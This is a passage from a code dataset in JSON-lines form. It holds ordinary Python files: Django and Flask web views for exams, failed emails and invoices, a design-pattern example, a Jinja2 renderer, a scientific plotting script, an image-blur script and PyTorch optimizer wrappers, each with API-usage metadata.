"call"}, {"api_name": "author.models.Question.objects", "line_number": 132, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 132, "usage_type": "name"}, {"api_name": "author.models.Question.objects.filter", "line_number": 133, "usage_type": "call"}, {"api_name": "author.models.Question.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "author.models.Question", "line_number": 133, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 134, "usage_type": "call"}, {"api_name": "examiner.serializers.ExamCreateSerializer", "line_number": 144, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 152, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 152, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 156, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 157, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 158, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 158, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 158, "usage_type": 
"name"}, {"api_name": "examiner.models.Exam.objects.get", "line_number": 162, "usage_type": "call"}, {"api_name": "examiner.models.Exam.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 162, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 163, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 163, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 164, "usage_type": "name"}, {"api_name": "django.core.mail.send_mail", "line_number": 180, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 188, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 188, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 188, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 192, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 194, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 194, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 194, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamListSerializer", "line_number": 196, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 197, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 197, "usage_type": "attribute"}, {"api_name": "rest_framework.filters", "line_number": 197, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 197, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam.own_objects.filter", "line_number": 206, "usage_type": "call"}, {"api_name": "examiner.models.Exam.own_objects", "line_number": 206, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 206, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 210, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 212, "usage_type": "name"}, {"api_name": "examiner.models.Exam.objects.get", "line_number": 215, "usage_type": "call"}, {"api_name": "examiner.models.Exam.objects", "line_number": 215, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 215, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 216, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 216, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 217, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 220, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamListSerializer", "line_number": 221, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 221, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 222, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 222, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 222, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 226, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 228, "usage_type": "name"}, {"api_name": "examiner.models.Exam.objects.get", 
"line_number": 231, "usage_type": "call"}, {"api_name": "examiner.models.Exam.objects", "line_number": 231, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 231, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 232, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 232, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 233, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 236, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamSerializer", "line_number": 237, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 237, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 238, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 238, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 238, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 242, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 244, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 244, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 244, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 248, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 248, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 248, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 249, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 249, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 250, "usage_type": "name"}, {"api_name": "examiner.serializers.ExamSerializer", "line_number": 255, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 258, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 258, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 259, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 259, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 263, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 264, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 265, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 265, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 265, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 269, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 269, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 269, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 270, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 270, "usage_type": "name"}, {"api_name": 
"django.http.Http404", "line_number": 271, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 274, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 275, "usage_type": "argument"}, {"api_name": "examiner.models.Exam.soft_delete", "line_number": 276, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 276, "usage_type": "name"}, {"api_name": "examiner.models.Exam.is_updated", "line_number": 277, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 277, "usage_type": "name"}, {"api_name": "examiner.models.Exam.save", "line_number": 278, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 278, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 279, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 279, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 279, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 283, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 284, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 285, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 285, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 285, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 289, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 289, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 289, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 290, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 290, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 291, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 299, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 299, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 299, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 303, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 304, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 305, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 305, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 305, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 309, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 309, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 309, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 310, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 310, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 311, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 314, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 315, "usage_type": "argument"}, {"api_name": "examiner.models.Exam.deactivate", 
"line_number": 316, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 316, "usage_type": "name"}, {"api_name": "examiner.models.Exam.is_updated", "line_number": 317, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 317, "usage_type": "name"}, {"api_name": "examiner.models.Exam.save", "line_number": 318, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 318, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 319, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 319, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 319, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 323, "usage_type": "name"}, {"api_name": "examiner.renderers.ExamRenderer", "line_number": 324, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 325, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsExaminerPermission", "line_number": 325, "usage_type": "name"}, {"api_name": "examiner.custom_permissions.IsOwnExaminerPermission", "line_number": 325, "usage_type": "name"}, {"api_name": "examiner.models.Exam.everything.get", "line_number": 329, "usage_type": "call"}, {"api_name": "examiner.models.Exam.everything", "line_number": 329, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 329, "usage_type": "name"}, {"api_name": "examiner.models.Exam.DoesNotExist", "line_number": 330, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 330, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 331, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 334, "usage_type": "name"}, {"api_name": "examiner.models.Exam", "line_number": 335, "usage_type": "argument"}, {"api_name": "examiner.models.Exam.activate", "line_number": 336, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 336, "usage_type": "name"}, {"api_name": "examiner.models.Exam.is_updated", "line_number": 337, "usage_type": "attribute"}, {"api_name": "examiner.models.Exam", "line_number": 337, "usage_type": "name"}, {"api_name": "examiner.models.Exam.save", "line_number": 338, "usage_type": "call"}, {"api_name": "examiner.models.Exam", "line_number": 338, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 339, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 339, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 339, "usage_type": "name"}]} +{"seq_id": "4315218622", "text": "#!/usr/bin/env python\n\n\"\"\"Example of the adapter pattern.\n\nThe Adapter Pattern is useful to either either map two different interfaces or\nto just modify (wrap) an existing API.\n\"\"\"\n\nfrom datetime import datetime\n\n\nclass AnnoyingAPI(object):\n def method_with_annoying_arguments(self, month, date, year, minute, second):\n return str(month) + '/' + str(date) + '/' + str(year)\n\n\nclass AnnoyingAdapter(object):\n def __init__(self):\n self.annoying_api = AnnoyingAPI()\n\n def nicer_method(self, time_object):\n mo = time_object.month\n d = time_object.day\n y = time_object.year\n mi = time_object.minute\n s = time_object.second\n return self.annoying_api.method_with_annoying_arguments(mo, d, y, mi, s)\n\n\nif __name__ == '__main__':\n adapter = AnnoyingAdapter()\n r = 
adapter.nicer_method(datetime.now())\n print(r)", "repo_name": "gijs/python-design-patterns", "sub_path": "adapter.py", "file_name": "adapter.py", "file_ext": "py", "file_size_in_byte": 875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "40538503071", "text": "import json\r\nfrom jinja2 import Environment,FileSystemLoader\r\n\r\nwith open('project.json') as f:\r\n data = json.load(f)\r\nfileLoader=FileSystemLoader(\"templates\")\r\nenv=Environment(loader=fileLoader)\r\n\r\nrender=env.get_template(\"design.html\").render(data=data,title=\"simple page\")\r\n\r\nfileName=\"index.html\"\r\n\r\nwith open(f\"./site/{fileName}\",\"w\")as f:\r\n f.write(render)", "repo_name": "ckchetan/IOT-Ready-project", "sub_path": "project.py", "file_name": "project.py", "file_ext": "py", "file_size_in_byte": 367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 6, "usage_type": "call"}, {"api_name": "jinja2.Environment", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "19258980959", "text": "\n\n'''\nPlots distribution of OVI absorbing cells' \nspherical velocities\n'''\n\nfrom __future__ import print_function\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nloc = '/home/jacob/research/code/analysis/ovi/'\nfilename = 'vela2b-{0:d}.a0.490.i90_OVIcellsGalFrame.h5'\ngalNums = range(21,30)\n\nfor i,galNum in enumerate(galNums):\n\n fname = loc+filename.format(galNum)\n try:\n df = pd.read_hdf(fname,'data')\n except IOError:\n continue\n \n if i==0:\n cells = df.copy()\n else:\n cells = pd.concat([cells,df])\n\nprint(len(cells))\n\ncellMajor = cells[cells['cellPlane']]\ncellMinor = cells[cells['cellOutflow']]\nlosMajor = cells[cells['losPlane']]\nlosMinor = cells[cells['losOutflow']]\n\nfig,ax = plt.subplots(3,3,figsize=(15,15),sharey='row',sharex=True)\n\nfields = 'vr vphi vtheta'.split()\nlabels = 'Radial Polar Rotating'.split()\nbins = np.linspace(-800,800,50)\n\ncols = ('vr_mean vr_std vr_skew'.split() + \n 'vPolar_mean vPolar_std vPolar_skew'.split() + \n 'vRotate_mean vRotate_std vRotate_skew'.split())\nprefix = 'vr vPolar vRotate'.split()\nrows = 'full cell_major cell_minor los_major los_minor'.split()\n\nstats = pd.DataFrame(columns=cols,index=rows)\n\nfor i,(field,label) in enumerate(zip(fields,labels)):\n \n # First row is entire sample\n ax[0,i].hist(cells[field],bins=bins,normed=True,histtype='step',color='black',label='Full')\n\n stats[prefix[i]+'_mean'].loc['full'] = cells[field].mean()\n stats[prefix[i]+'_std'].loc['full'] = cells[field].std()\n stats[prefix[i]+'_skew'].loc['full'] = cells[field].skew()\n print('Field: {0:s}\\t Full\\t Num Nan: {1:d}'.format(field, \n cells[field].isnull().sum()))\n\n # Second row is major/minor split as defined by cells\n ax[1,i].hist(cellMajor[field],bins=bins,normed=True,histtype='step',\n color='red',label='Cell Major')\n ax[1,i].hist(cellMinor[field],bins=bins,normed=True,histtype='step',\n color='blue',label='Cell Minor')\n\n stats[prefix[i]+'_mean'].loc['cell_major'] = cellMajor[field].mean()\n stats[prefix[i]+'_std'].loc['cell_major'] = cellMajor[field].std()\n 
stats[prefix[i]+'_skew'].loc['cell_major'] = cellMajor[field].skew()\n\n stats[prefix[i]+'_mean'].loc['cell_minor'] = cellMinor[field].mean()\n stats[prefix[i]+'_std'].loc['cell_minor'] = cellMinor[field].std()\n stats[prefix[i]+'_skew'].loc['cell_minor'] = cellMinor[field].skew()\n\n print('Field: {0:s}\\t Cell Major\\t Num Nan: {1:d}'.format(field, \n cellMajor[field].isnull().sum()))\n print('Field: {0:s}\\t Cell Minor\\t Num Nan: {1:d}'.format(field, \n cellMinor[field].isnull().sum()))\n\n # Third row is major/minor split as defined by LOS\n ax[2,i].hist(losMajor[field],bins=bins,normed=True,histtype='step',\n color='red',label='LOS Major')\n ax[2,i].hist(losMinor[field],bins=bins,normed=True,histtype='step',\n color='blue',label='LOS Minor')\n\n stats[prefix[i]+'_mean'].loc['los_major'] = losMajor[field].mean()\n stats[prefix[i]+'_std'].loc['los_major'] = losMajor[field].std()\n stats[prefix[i]+'_skew'].loc['los_major'] = losMajor[field].skew()\n\n stats[prefix[i]+'_mean'].loc['los_minor'] = losMinor[field].mean()\n stats[prefix[i]+'_std'].loc['los_minor'] = losMinor[field].std()\n stats[prefix[i]+'_skew'].loc['los_minor'] = losMinor[field].skew()\n\n print('Field: {0:s}\\t LOS Major\\t Num Nan: {1:d}'.format(field, \n losMajor[field].isnull().sum()))\n print('Field: {0:s}\\t LOS Minor\\t Num Nan: {1:d}'.format(field, \n losMinor[field].isnull().sum()))\n\n# Label\nfor a in ax.flatten():\n a.set_xlim([-800,800])\n a.legend(loc='best')\n\nfor a,label in zip(ax[-1,:],labels):\n a.set_xlabel('{0:s} Velocity [km/s]'.format(label))\n\nfor a in ax[:,0]:\n a.set_ylabel('Relative Counts')\n\nfig.subplots_adjust(hspace=0.05,wspace=0)\nfig.savefig('oviSphericalVelocitiesDist.png',bbox_inches='tight',dpi=300)\n\nstats.to_csv('oviSphericalVelocitiesBulk.csv')\n\n\n\n\n", "repo_name": "jrvliet/analysis", "sub_path": "ovi/sphericalVelocityAnalysis.py", "file_name": "sphericalVelocityAnalysis.py", "file_ext": "py", "file_size_in_byte": 4012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_hdf", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "23199919774", "text": "import cv2\nimport numpy as np\nfrom scipy.signal import convolve2d\n\n\nimages = ['./final/input1.png', './final/input2.png', './final/input3.png', './final/input4.png']\n\ndef streak_kernel(shape):\n # Example kernel simulating horizontal motion blur\n ny, nx = shape\n k = np.zeros(shape)\n k[ny//2-1, :] = 0.5\n k[ny//2+0, :] = 1.\n k[ny//2+1, :] = 0.5\n k[:, 0] *= 0.\n k[:, 1] *= 0.5\n k[:, -2] *= 0.5\n k[:, -1] *= 0.\n k /= np.sum(k)\n return k\n\nk = streak_kernel((31,31))\ncount = 1\n\n\nfor file in images:\n\n img = cv2.imread(file)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n y = convolve2d(img, k, mode='same', boundary='wrap')\n path = './final/final' + str(count) + '.jpg'\n cv2.imwrite(path, y)\n\n# y = convolve2d(img, k, mode='same', boundary='wrap')\n# path = 'final' + str(count) + '.jpg'\n# cv2.imwrite(path, y)\n# count += 1\n\n# image = \"adcd.png\"\n\n\n", "repo_name": "laksh-nanwani/dip-project", "sub_path": "motionBlur.py", "file_name": 
"motionBlur.py", "file_ext": "py", "file_size_in_byte": 895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 29, "usage_type": "attribute"}, {"api_name": "scipy.signal.convolve2d", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "24843507038", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 25 17:52:56 2023\r\n\r\n@author: oowoyele\r\n\"\"\"\r\n\r\nimport torch\r\n\r\n\r\nclass optimizer(): # fully connected neural network class\r\n def __init__(self, fcn = None, parameters = None, learning_rate = 0.01):\r\n \r\n if parameters == None:\r\n self.parameters = fcn.parameters\r\n else:\r\n self.parameters = parameters\r\n \r\n self.optim = torch.optim.Adam(parameters, lr=learning_rate)\r\n #self.fcn = fcn\r\n \r\n \r\n def step(self, loss):\r\n #self.fcn.pred()\r\n #mse = self.fcn.mse()\r\n #torch.autograd.set_detect_anomaly(True)\r\n self.optim.zero_grad()\r\n loss.backward(retain_graph=True)\r\n self.optim.step()\r\n \r\n \r\nclass optimizerMoE(): # fully connected neural network class\r\n def __init__(self, fcn_list = None, parameters = None, learning_rate = 0.01):\r\n\r\n if fcn_list is not None:\r\n fcn_given = True\r\n self.num_experts = len(fcn_list)\r\n elif parameters is not None:\r\n params_given = True\r\n self.num_experts = len(parameters)\r\n \r\n self.optim = []\r\n #self.fcn_list = fcn_list\r\n self.mse_list = [[]]*len(fcn_list)\r\n \r\n for iexp in range(self.num_experts):\r\n if fcn_given:\r\n self.parameters = fcn_list[iexp].parameters\r\n elif params_given:\r\n self.parameters = parameters[iexp]\r\n \r\n self.optim += [torch.optim.Adam(self.parameters, lr=learning_rate)]\r\n if fcn_given:\r\n self.mse_list[iexp] = fcn_list[iexp].mse()\r\n \r\n \r\n def step(self, loss_list):\r\n for iexp in range(self.num_experts):\r\n self.optim[iexp].zero_grad()\r\n loss_list[iexp].backward(retain_graph=True)\r\n self.optim[iexp].step()\r\n #fcn.pred()\r\n #loss_list[iexp] = fcn.mse()", "repo_name": "DMO-LAB/AdaptiveML", "sub_path": "optimize.py", "file_name": "optimize.py", "file_ext": "py", "file_size_in_byte": 1982, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.optim.Adam", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 52, "usage_type": "attribute"}]} +{"seq_id": "26480555064", "text": "\"\"\"Failed Email views.\"\"\"\n# Third-Party Libraries\nfrom flask import jsonify, request\nfrom flask.views import MethodView\n\n# cisagov Libraries\nfrom api.manager import FailedEmailManager, SubscriptionManager, TargetManager\nfrom utils.logging import setLogger\nfrom utils.mailgun import get_failed_email_events\n\nlogger = setLogger(__name__)\n\nfailed_email_manager = FailedEmailManager()\nsubscription_manager = SubscriptionManager()\ntarget_manager = TargetManager()\n\n\nclass FailedEmailsView(MethodView):\n 
\"\"\"FailedEmailsView.\"\"\"\n\n def get(self):\n \"\"\"Get.\"\"\"\n success = get_failed_email_events()\n # Allow querying a list of failed emails\n parameters = failed_email_manager.get_query(request.args)\n parameters[\"removed\"] = {\"$in\": [False, None]}\n if request.args.get(\"removed\", \"\").lower() == \"true\":\n parameters[\"removed\"] = True\n success[\"failed_emails\"] = failed_email_manager.all(params=parameters)\n return jsonify(success)\n\n\nclass FailedEmailView(MethodView):\n \"\"\"FailedEmailView.\"\"\"\n\n def delete(self, failed_email_id):\n \"\"\"Delete.\"\"\"\n failed_email = failed_email_manager.get(document_id=failed_email_id)\n failed_email[\"removed\"] = True\n subscriptions = subscription_manager.all(\n params={\n \"target_email_list\": {\n \"$elemMatch\": {\n \"email\": failed_email[\"recipient\"],\n }\n },\n }\n )\n for subscription in subscriptions:\n try:\n target = next(\n (\n target\n for target in subscription[\"target_email_list\"]\n if target[\"email\"] == failed_email[\"recipient\"]\n ),\n None,\n )\n subscription_manager.delete_from_list(\n document_id=subscription[\"_id\"],\n field=\"target_email_list\",\n data=target,\n )\n except Exception as e:\n logger.exception(e)\n failed_email[\"removed\"] = False\n failed_email_manager.update(\n document_id=failed_email_id,\n data=failed_email,\n )\n return jsonify({\"success\": True})\n", "repo_name": "cisagov/con-pca-api", "sub_path": "src/api/views/failed_email_views.py", "file_name": "failed_email_views.py", "file_ext": "py", "file_size_in_byte": 2346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.logging.setLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "api.manager.FailedEmailManager", "line_number": 13, "usage_type": "call"}, {"api_name": "api.manager.SubscriptionManager", "line_number": 14, "usage_type": "call"}, {"api_name": "api.manager.TargetManager", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 18, "usage_type": "name"}, {"api_name": "utils.mailgun.get_failed_email_events", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.views.MethodView", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "31077095146", "text": "import logging\n\nfrom django.conf import settings\nfrom django.utils.module_loading import import_string\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.timezone import now\nfrom django.http import HttpResponse\nfrom django_filters.rest_framework import DjangoFilterBackend\n\nfrom rest_framework import filters, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_202_ACCEPTED, HTTP_409_CONFLICT\n\nfrom fleio.activitylog.utils.decorators import log_enduser_activity\nfrom fleio.billing import utils\nfrom 
fleio.billing.models.invoice import InvoiceStatus\nfrom fleio.billing.operations import get_invoice_payment_options\nfrom fleio.core.drf import EndUserOnly\nfrom fleio.core.models import Client\nfrom fleio.core.models import get_default_currency\nfrom fleio.core.filters import CustomFilter\nfrom fleio.billing.invoicing import tasks\nfrom fleio.billing.models import Invoice, TaxRule\nfrom fleio.billing.models import ClientCredit\nfrom fleio.billing.settings import BillingItemTypes\nfrom .serializers import InvoiceBriefSerializer, InvoiceDetailSerializer\nfrom fleio.billing.serializers import AddCreditSerializer\nfrom fleio.billing.invoicing.pdf import pdf_invoice\nfrom io import BytesIO\n\nLOG = logging.getLogger(__name__)\n\n\n@log_enduser_activity(\n category_name='billing', object_name='invoice',\n additional_activities={\n 'pay_from_credit_balance': _('User {username} ({user_id}) paid invoice {object_id} using credit.'),\n }\n)\nclass InvoiceViewSet(viewsets.ReadOnlyModelViewSet):\n model = Invoice\n permission_classes = (EndUserOnly,)\n filter_backends = (filters.OrderingFilter, DjangoFilterBackend, CustomFilter, filters.SearchFilter)\n filter_fields = ('status', 'client', 'id')\n ordering_fields = ('issue_date', 'due_date', 'status', 'client',)\n search_fields = ('id', 'first_name', 'last_name', 'status', 'due_date', 'number')\n ordering = ['id']\n\n def get_queryset(self):\n return Invoice.objects.filter(client__in=self.request.user.clients.all())\n\n def get_serializer_class(self):\n if self.action == 'retrieve':\n return InvoiceDetailSerializer\n else:\n return InvoiceBriefSerializer\n\n @action(detail=False, methods=['POST'])\n def add_credit_invoice(self, request):\n serializer = AddCreditSerializer(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n try:\n client = request.user.clients.get(pk=serializer.validated_data['client'])\n except Client.DoesNotExist:\n raise ValidationError({'client': _('Client not found')})\n credit = serializer.validated_data['credit']\n # Look for unpaid invoices already containing credit addition\n credit_invoices_unpaid = Invoice.objects.filter(client=client).unpaid().for_credit()\n if credit_invoices_unpaid.count() > 0:\n raise ValidationError({'detail': _('An unpaid credit invoice already exists')})\n item_description_msg = _('Add {} {} to credit balance').format(credit, client.currency.code)\n item_taxes = []\n if client.billing_settings.add_tax_for_credit_invoices and not 